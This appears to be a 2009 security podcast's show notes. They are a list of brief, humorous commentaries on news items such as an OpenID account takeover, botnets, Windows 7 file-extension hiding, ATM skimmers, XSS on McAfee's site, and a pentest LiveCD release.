  2. OpenID Fail? - [Mick] - Jeff Atwood at Codinghorror.com (great site btw) made a splash on May 3rd with a revelation of someone succesfully assuming another person's OpenID account... HIS!!! Turns out there's quite a bit more to this story, it's worth a detailed read. Remember, your weakest link is always what you need to be concerned about. Defense in depth is a mantra for a reason.
  3. Cops take UR data - [Mick] - People abuse access to sensitive data? All. the. time. Here's an instance of cops committing fraud (yes fraud) by conducting searches on celebrities. Priva C. Eagle, mascot for personal privacy is weeping. See what you did? You made her cry.
  4. Secure version of Windows released! - [Mick] - Microsoft makes a truly secure version of Windows! SWEET!! Great job MS! WHAT?!? Only for the US Air Force? I can no has secure? weak.  :-(
  5. Zombies up by 50% from last year - [Mick] - Zombies! Your computer wants braaaaains! Botnets create 12 MILLION *NEW* zombies. blerg.
  6. Informed P2P User Act of 2009 - [Mick] - The US House of Representatives is looking to ensure that software "provides users with a 'clear and conspicuous notice' of what it does". What?!? Folks, that ain't the problem. Is there *anyone* who doesn't know what's happening when you open up your bit torrent software and point it to copyrighted data?
  7. Mac OS X 10.5.7 Real Soon Now? - [Mick] - Rumors about Apple products and software are like peanut butter and jelly... they go so well together! Rumors about the release timing for 10.5.7 have been circulating on the Mac forums for months now. Whatever the release day for is, while others are excited about new features and tweaks, I'm just hoping they patch the open zero days. Remember just because your system has an Apple icon on it does *not* mean you're secure. (yeah we know we're preaching to the choir)
  8. Old attacks New again? - [Larry] - So, remember when hiding file extensions was bad, especially when Windows explorer misinterpreted them - Is shows a Notepad document when the item was really an executable? Yeah, well MS fixed the problem, until Windows 7 RC that is.
  9. Careful where you type passwords - [Larry] - Wow, so ever wonder where those keystrokes go that you aren't typing in to the right text box - the ones that disappear into the ether. Are you actually typing them into a different window, and posting them somewhere? Well, certainly that possible, I've done it. But what about using the same user and password on another website, and the other site stores the passwords in the clear, or easily reversible...
  10. Strike Fighter Data leaked by p2p - [Larry] - this is why I continue to miss the seewhatyoushare.com project. Go use archive.org to see the tale...
  11. How not to destroy your data - [Larry] - Wipe, yes. Melt with thermite, yes. Toss overboard into the ocean, No.
  12. New version 1.0 out - [Larry] - This is great. Now not only does it support VLAN hopping for Cisco and Avaya VOIP infrastructures, it fully supports Nortel as well!
  13. Excellent malware write-ups - [Mick] - Holy cow! This is one of the better write-ups on malware I've seen in a long time. Herr Kleissner, we'd love to have you on the show. Anyone who works in this arena, look at this work. There's a new ninja arriving. (Thanks MikeP for sending us this link!)
  14. Bypassing your corporate firewall - not a good idea - [Paul] - One of the things we stress on this show is that you should always have permission. You may choose to ignore that, but that doesn't change our stance on the issue. We act responsibly (most of the time) and ask that all of you act responsibly as well. I completely respect the guys at Hak.5, but use caution when you see (or state) something like "Corporate and university firewalls can be a particular PITA ¿ especially if you¿re a gamer.". Whether you are a "gamer" or not, violating your corporate policy will get you fired.
  15. ATM Skimming Device - [Paul] - This is really, a device that reads the ATM card and has a camera to record the pin. Its slick and it works. This can also be applied to physical security as well.
  16. Macfee has XSS and CSRF on their site - [Paul] - Sweet! Don't they use Hacker Safe? Oh wait, they are hacker safe, but no they weren't :) Mike Bailey found this hole and poked McAfee in the eye on his blog.
  17. Security Considerations in the Design of the Human Penis - [Paul] - So this is part of Bruce Schnier's new series "Friday Penis Blog". Just way more information that I needed about penis.
  18. Windows 7 FAIL - [Paul] - Get this, a well-known attack vector is the ability to hide the extension by doing something like "virus.jpg.exe" and Windows would hide the exe portion. So a JPG image is really an executable. Certainly they fixed this in Windows 7, NOT!
  19. LOL at l0lw0rm - [Paul] - A great write-up from the MW-Blog on how this worm works. Its funny, kinda LOLzy, like his message to AV vendors " Hello Antivirus makers. This is VXer Ravo_5002 speaking. Please call this virus W32.l0lw0rm. How the fuck do you make up these names anyways? -Rav¿" Dude, you don't get to pick.
  20. If you see something... - [Paul] - Put a wireless access point in it! This hotel puts suitecases as decorations in lobby. What!? Yea, IED anyone? Random cell phones on the counter? What a great place to put a camera, listening device, etc...

Other Stories Of Interest

  1. Pentoo 2009.0.reallyclosetobeta - The Pentoo team has released what is hopefully the final alpha build of Pentoo 2009. Pentoo is a penetration testing LiveCD distribution based on Gentoo. Download your copy here
  2. Strange Beer Names [Paul]
  3. World's Greatest Beer Names [Paul]
  4. Double-wide trailers on the Moon! - It looks like the future of space exploration is redneck.